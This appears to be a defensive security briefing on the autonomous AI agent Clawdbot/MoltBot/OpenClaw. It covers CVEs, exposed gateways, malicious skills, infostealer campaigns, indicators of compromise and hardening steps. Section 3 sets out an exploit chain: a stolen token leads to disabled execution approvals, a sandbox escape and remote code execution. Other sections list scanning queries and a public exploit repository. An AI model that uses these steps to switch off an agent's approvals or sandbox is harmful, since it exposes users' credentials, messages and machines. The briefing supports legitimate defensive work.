Clawdbot / MoltBot / OpenClaw - TJS Security Briefing - Tech Jacks Solutions

Moltbot, Clawdbot, Security Moltbot, Security Clawdbot,

_ February 6, 2026_ Tech Jacks Solutions_ 0 Comments

Classification: Public
Date: February 6, 2026
Distribution: Security Operations, IT Leadership, Executive Team, Endpoint Management
Prepared By: Tech Jacks Solutions Security Intelligence

1. Executive Summary

An open-source AI agent called Clawdbot (rebranded to MoltBot on January 27, then to OpenClaw on January 29-30, 2026) represents one of the most significant shadow AI risks to emerge in early 2026. The tool went from niche GitHub project to over 145,000 stars in under two weeks per CNBC reporting, with over 100,000 users granting it autonomous access to their operating systems, messaging platforms, credentials, and corporate services. Security researchers have identified critical vulnerabilities including CVE-2026-25253 (CVSS 8.8, one-click RCE), thousands of exposed control panels leaking API keys and private messages, active infostealer campaigns targeting its plaintext credential storage, and malicious extensions impersonating the tool. Exposure estimates range from several thousand to over 21,000 publicly accessible instances depending on scanning tool and methodology, with Censys identifying 21,639 as of January 31, 2026. According to VentureBeat and Guardz reporting, commodity malware families (RedLine, Lumma, Vidar) added Clawdbot-specific credential harvesting modules before many security teams had identified the tool in their environments. Enterprise exposure is real: Noma Security confirmed Clawdbot instances running on corporate endpoints, and the tool can connect to Slack, Microsoft Teams, Gmail, and SharePoint with a single OAuth grant.

This briefing covers what Clawdbot/MoltBot is, how it works, its verified vulnerability profile, indicators of installation and compromise, and specific guidance for both enterprise blocking and safer personal use.

2. What Is Clawdbot / MoltBot / OpenClaw?

Clawdbot is a self-hosted, open-source AI personal assistant created by Austrian developer Peter Steinberger. It connects large language models (Claude, OpenAI, DeepSeek, and others including locally-run models) to messaging platforms and local system capabilities. Steinberger recommends Claude Opus 4.5 for optimal results, but the multi-model support widens the credential exposure surface since API keys for each connected model backend are stored locally. The tool runs as a persistent background service on the user’s device and accepts instructions through WhatsApp, Telegram, Slack, Discord, Signal, iMessage, Microsoft Teams, and other channels.

The naming history matters for detection. The project launched as Clawdbot with the agent name “Clawd.” Anthropic issued a trademark request over the similarity to “Claude,” prompting a rename to MoltBot (agent: “Molty”) on January 27. A second rename to OpenClaw followed on January 29-30 after Steinberger acknowledged the MoltBot name hadn’t resonated with the community. All three names remain active in the wild across different deployments, forks, and cached installations.

What separates this from a typical chatbot: Clawdbot doesn’t just answer questions. It executes. It reads and writes files, runs shell commands, browses the web, manages calendars, sends emails, and maintains persistent memory of prior interactions stretching back months. It does all of this autonomously, often without per-action user approval. Security researchers have mapped its attack surface against the OWASP Top 10 for Agentic Applications, finding alignment across categories (Palo Alto Networks’ analysis references the OWASP Agentic AI Survival Guide in its assessment).

The core architecture consists of two components. The Clawdbot Gateway (default port 18789) handles message routing, AI inference, credential management, and tool execution. The Control UI is a web-based admin panel for configuration, conversation inspection, and key management. Both become attack surfaces when deployed without hardening.

Sources:

3. Critical Vulnerabilities

CVE-2026-25253: One-Click Remote Code Execution (CVSS 8.8)

The Control UI accepted a gatewayUrl parameter from the browser’s query string without validation. On page load, it auto-connected via WebSocket to the specified URL and transmitted the stored authentication token. An attacker hosting a malicious page could steal the token in milliseconds, establish a cross-site WebSocket connection back to the victim’s local instance (using the victim’s own browser to bypass localhost restrictions), disable sandboxing via the API, and execute arbitrary commands on the host.

The kill chain: victim visits a crafted URL, token exfiltrates instantly, attacker connects to gateway, disables sandbox (exec.approvals.set = off), escapes Docker container (tools.exec.host = gateway), achieves full RCE on the host machine.

Fix: Version 2026.1.29 (released January 30, 2026). Public PoC exploit code is available on GitHub (ethiack/moltbot-1click-rce).

CVE-2026-25157: Command Injection

Tenable’s analysis identified additional command injection vulnerabilities in gateway components, including CVE-2026-25157, enabling attackers to execute arbitrary OS commands through crafted inputs. A researcher from depthfirst chained two separate findings (including CVE-2026-25253) to achieve code execution on the bot, and these command injection CVEs represent a related but distinct attack path through the gateway’s input handling.

Note: Detailed CVSS scoring, specific affected version ranges, and granular remediation guidance for CVE-2026-25157 remain limited in public reporting at time of publication. Organizations should monitor the NVD entry and Tenable’s plugin pipeline for updated scoring. The general remediation guidance (update to latest OpenClaw release, restrict gateway exposure) applies.

Unauthenticated Gateway Exposure (No CVE Assigned)

By default, the Clawdbot gateway binds to 0.0.0.0:18789, exposing its full API to any network interface. Connections originating from localhost are auto-authenticated without credentials. When users deploy behind reverse proxies (Nginx, Caddy) on the same server, the proxy forwards traffic as localhost, collapsing the authentication boundary entirely. External attackers gain full admin access without any exploit, just by navigating to the URL.

ClawdHub Supply Chain Risk

ClawdHub, the public skill registry, allows third-party skill installation with execution in the same operational context as the agent. Researcher Jamieson O’Reilly demonstrated the risk by uploading a benign-appearing skill, inflating its download count past 4,000, and reaching 16 developers in seven countries within eight hours. Koi Security identified hundreds of malicious skills in the registry.

Sources:

4. Active Threat Landscape

Infostealer Targeting

Commodity malware-as-a-service families adapted faster than defenders. Guardz threat intelligence confirmed that RedLine, Lumma, and Vidar have deployed Clawdbot-specific modules targeting the ~/.clawdbot/ directory structure. Unlike browser password stores (encrypted with DPAPI on Windows, Keychain on macOS), Clawdbot stores credentials in plaintext JSON and Markdown files. No decryption needed. One file compromise yields multiple service tokens across platforms.

Hudson Rock characterized this as “Cognitive Context Theft,” noting that attackers don’t just steal credentials; they gain access to months of conversation history, planning context, behavioral patterns, and social graphs.

Crypto Scams and Handle Hijacking

When the project renamed from Clawdbot to MoltBot, crypto scammers seized the abandoned @clawdbot handles on X and GitHub within seconds. They promoted a fake $CLAWD token on Solana that hit a $16 million market cap before crashing to near zero. The hijacked handles reached the project’s 60,000+ followers.

Fake VS Code Extensions

Malicious “Clawdbot Agent” extensions were published on the VS Code marketplace, installing ScreenConnect-based remote access trojans on developer machines.

Exposed Instances at Scale

Hunt.io identified over 17,500 exposed instances across 52 countries. The United States leads with 35.6% of deployments (891 instances on Hunt.io’s scan; Censys counted 21,639 total). Straiker Labs confirmed successful exfiltration of API keys, service tokens, and WhatsApp session credentials from exposed instances during controlled testing. SOCRadar flagged 50+ newly registered domains containing the “clawd” keyword, a standard precursor to phishing campaigns.

Moltbook Platform Breach

Moltbook, the social network for AI agents, was discovered running on Supabase with Row Level Security disabled. The exposed API endpoint contained agent API keys, authentication tokens, and ownership mappings, allowing full impersonation of any registered AI agent.

Sources:

5. Enterprise Risk Assessment

Why This Matters for Organizations

Noma Security confirmed Clawdbot instances running across enterprise endpoints before security teams were aware of it. The tool connects to corporate services (Slack, Gmail, Microsoft Teams, SharePoint) via OAuth, and employees installing it on personal or work devices can inadvertently grant it access to corporate data. This is the “Shadow AI” problem in its purest form.

Heather Adkins, VP of Security Engineering at Google Cloud, publicly cautioned against running the tool on social media, stating “Don’t run Clawdbot” (citing a researcher who characterized it as “an infostealer malware disguised as an AI personal assistant”). Prompt Security CEO Itamar Golan (now leading AI security strategy at SentinelOne following their acquisition of Prompt Security) warned that agentic systems like Clawdbot “don’t just generate output. They observe, decide, and act continuously across email, files, calendars, browsers, and internal tools.”

Shruti Gandhi, general partner at Array VC, reported 7,922 attack attempts against her firm’s Clawdbot instance.

The tool fails what security researcher Simon Willison calls the “lethal trifecta” test: any agent with (1) private data access + (2) untrusted content exposure + (3) external communication capability = high risk. Clawdbot checks all three boxes by design.

Regulatory consideration: Under the EU AI Act and NIST AI RMF, running autonomous agents without governance, access controls, or risk management documentation may constitute non-compliance.

Sources:

6. Indicators of Installation & Compromise

Filesystem Artifacts (Check Endpoints)

Indicator	Path / Detail
Configuration directory	`~/.clawdbot/`, `~/.moltbot/`, `~/.openclaw/`
Main config file	`clawdbot.json` or `moltbot.json` (plaintext credentials)
Memory files	Markdown files in agent directory containing conversation history
Node.js processes	Long-running Node processes associated with gateway service
Default gateway port	TCP 18789 (WebSocket + HTTP multiplexed)
Control UI port	TCP 3000 (web-based admin panel)
mDNS broadcast	`_openclaw-gw._tcp` on port 5353

Network Indicators

Indicator	Detail
Outbound WebSocket traffic	Persistent connections to port 18789
Shodan/Censys HTML fingerprints	Page titles: “Clawdbot Control,” “Moltbot Control,” “OpenClaw Control”
TLS certificate fields	Self-signed certs with “Clawdbot,” “Moltbot,” or “OpenClaw” in organization name
Fofa dork	`app="Moltbot"`
Shodan dork	`moltbot-gw`
API endpoint (unauthenticated)	`/api/export-auth` (leaks stored tokens pre-patch)

Malicious Infrastructure IOCs

IOC Type	Detail
Fake VS Code extensions	“Clawdbot Agent” extensions installing ScreenConnect RATs
Domain squatting	50+ domains registered with “clawd” keyword (SOCRadar)
Crypto scam handles	Former @clawdbot on X and GitHub promoting fake $CLAWD token
Malicious skills	Hundreds of backdoored skills on ClawdHub (Koi Security)

7. Enterprise Blocking & Risk Reduction Checklist

Immediate Actions (Do This Week)

[ ] Scan endpoints for ~/.clawdbot/, ~/.moltbot/, ~/.openclaw/ directories using EDR or endpoint management tools
[ ] Scan network for WebSocket traffic to ports 18789 and 3000; monitor DNS for mDNS broadcasts on port 5353
[ ] Scan external IP ranges using Shodan queries for “Clawdbot Control,” “Moltbot Control,” or “OpenClaw Control” HTML fingerprints
[ ] Block port 18789 at the perimeter firewall for inbound connections
[ ] Block known malicious VS Code extensions named “Clawdbot Agent” via extension management policies
[ ] Add Clawdbot/MoltBot/OpenClaw to your organization’s prohibited software list and endpoint application control policies
[ ] Revoke OAuth tokens if any corporate service (Slack, Gmail, Microsoft Teams, SharePoint) shows Clawdbot/MoltBot/OpenClaw as an authorized integration
[ ] Alert SOC analysts to watch for the filesystem and network indicators listed in Section 6

Policy & Governance

[ ] Update acceptable use policy to explicitly prohibit AI agents with autonomous system access on corporate devices
[ ] Classify AI agents as privileged infrastructure requiring the same security review as production servers
[ ] Require security review before any AI agent is connected to corporate services via OAuth or API keys
[ ] Brief development teams specifically: developer curiosity drives adoption, and this tool was marketed to developers first
[ ] Map existing deployments against the OWASP Top 10 for Agentic Applications

Credential Rotation (If Installation Found)

[ ] Rotate all API keys that were stored in Clawdbot configuration (Anthropic, OpenAI, Google AI, Slack, Telegram, etc.)
[ ] Rotate OAuth tokens for any connected corporate services
[ ] Invalidate WhatsApp/Signal/iMessage session credentials if messaging integrations were configured
[ ] Review conversation history files for any leaked corporate data, internal documents, or credentials
[ ] Scan the device for infostealer indicators (RedLine, Lumma, Vidar artifacts)

8. Personal Device Safety Guidance

For individuals who choose to run Clawdbot/OpenClaw on personal devices (not recommended for most users), the following hardening steps reduce (but do not eliminate) risk.

Before installation, ask yourself this: Would you give a stranger full access to your email, messages, files, and shell for the privilege of having them schedule your calendar? That’s the trust model.

If You Still Proceed

Update to version 2026.1.29 or later to patch CVE-2026-25253 (one-click RCE). Running any earlier version means a single malicious link can compromise your machine.
Bind gateway to localhost only. Verify gateway.host is set to 127.0.0.1, not 0.0.0.0. This is the single most impactful configuration change.
Set a strong gateway authentication password. Verify gateway.auth.password is configured and that your reverse proxy (if used) correctly passes authentication headers. The localhost auto-auth bypass collapses when proxies are misconfigured.
Whitelist tools explicitly. Use the OpenClaw Security Guide’s allowlist mode to restrict which tools the agent can invoke. Block shell execution capabilities unless specifically needed.
Scope API tokens narrowly. Every service token granted to the agent should have minimum required permissions. Don’t give it admin-level access to anything.
Don’t connect corporate accounts. Period. Keep work email, work Slack, and any corporate services completely disconnected from personal Clawdbot instances.
Don’t install skills from ClawdHub unless you’ve personally audited the source code. The marketplace has minimal vetting (a one-week-old GitHub account is sufficient to publish), and hundreds of malicious skills have been identified.
Monitor network traffic. Install a local network monitoring tool (LuLu on macOS, or equivalent) to track outbound connections from the Clawdbot process.
Run inside a container or VM. Docker with restricted capabilities reduces blast radius if the agent is compromised. Don’t run as root.
Verify you’re downloading from the official repository. With 50+ squatted domains and hijacked social handles, fake install pages distributing trojanized versions are a confirmed threat.

9. Framework Alignment

Threat	CIS Controls v8	NIST CSF 2.0	ISO 27001:2022	MITRE ATT&CK
Unauthorized AI agent installation	2.1, 2.3 (Software Inventory)	ID.AM-2	A.8.1 (User Endpoint Devices)	T1204 (User Execution)
Plaintext credential storage	16.4 (Encrypt Sensitive Data)	PR.DS-1	A.8.24 (Use of Cryptography)	T1552.001 (Credentials in Files)
Exposed admin interface	4.1, 12.1 (Network Security)	PR.PT-4	A.8.20 (Networks Security)	T1133 (External Remote Services)
Supply chain skills risk	16.2, 16.6 (Software Integrity)	PR.DS-6	A.8.30 (Outsourced Development)	T1195.002 (Supply Chain Compromise)
Infostealer targeting	10.1, 10.7 (Malware Defense)	DE.CM-4	A.8.7 (Protection Against Malware)	T1005 (Data from Local System)
OAuth token abuse	6.1, 6.3 (Access Control)	PR.AC-1	A.5.18 (Access Rights)	T1528 (Steal Application Access Token)

10. Authoritative Sources Used

Security Research Firms:

Noma Security: Enterprise Clawdbot Risk Analysis
Intruder: Clawdbot: When Easy AI Becomes a Security Nightmare
SOCRadar: What Is Clawdbot and Is It Actually Safe?
Guardz: ClawdBot Security Failures and Defense Playbook
Hunt.io: Hunting OpenClaw Exposures
Straiker Labs: Clawdbot/Moltbot Backdoor Analysis
Adversa AI: OpenClaw Security Guide 2026
depthfirst: 1-Click RCE CVE-2026-25253 Writeup

Vendor Security Analysis:

Palo Alto Networks: Why Moltbot May Signal the Next AI Security Crisis
Tenable: Clawdbot Agentic AI Security Vulnerabilities
Vectra AI: From Clawdbot to OpenClaw
Bitdefender: Moltbot Security Alert
Brandefense: Shadow AI Agent Gateways

Security News:

The Register: Clawdbot becomes Moltbot
The Hacker News: OpenClaw One-Click RCE
VentureBeat: Infostealers Target Clawdbot
Security Boulevard: Critical Vulnerabilities and Hardening Steps
CNBC: OpenClaw Open-Source AI Agent Rise and Controversy
TechCrunch: OpenClaw’s AI Assistants

Document Version: 1.0 Last Updated: February 6, 2026 Prepared By: Tech Jacks Solutions Security Intelligence

Author

Gallery

Contacts

Clawdbot / MoltBot / OpenClaw – TJS Security Briefing

1. Executive Summary

2. What Is Clawdbot / MoltBot / OpenClaw?

3. Critical Vulnerabilities